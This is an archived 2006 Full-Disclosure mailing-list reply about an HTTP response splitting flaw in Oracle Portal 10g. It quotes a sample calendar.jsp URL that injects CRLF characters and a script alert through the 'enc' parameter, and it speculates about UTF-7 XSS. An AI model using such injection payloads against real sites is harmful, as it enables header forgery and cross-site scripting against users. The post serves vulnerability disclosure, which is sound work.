[prev in list] [next in list] [prev in thread] [next in thread] 

List:       full-disclosure
Subject:    Re: [Full-disclosure] Oracle Portal 10g HTTP Response Splitting
From:       "Brian Eaton" <eaton.lists () gmail ! com>
Date:       2006-12-20 18:55:09
Message-ID: 242a0a8f0612201055y7509a182ra63a070ae7583694 () mail ! gmail ! com
[Download RAW message or body]

On 12/20/06, putosoft softputo <hasecorp@hotmail.com> wrote:
> Oracle Portal/Applications HTTP Response Splitting
> --------------------------------------------------
> 
> Sample:
> 
> http://<target>/webapp/jsp/calendar.jsp?enc=iso-8859-1%0d%0aContent-length=12%0d%0a%0d%0a%3Cscript%3Ealert('hi')%3C/script%3E
> 

So they let the URL specify the content-encoding?  They might be
vulnerable to XSS via UTF-7 as well.

Regards,
Brian

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic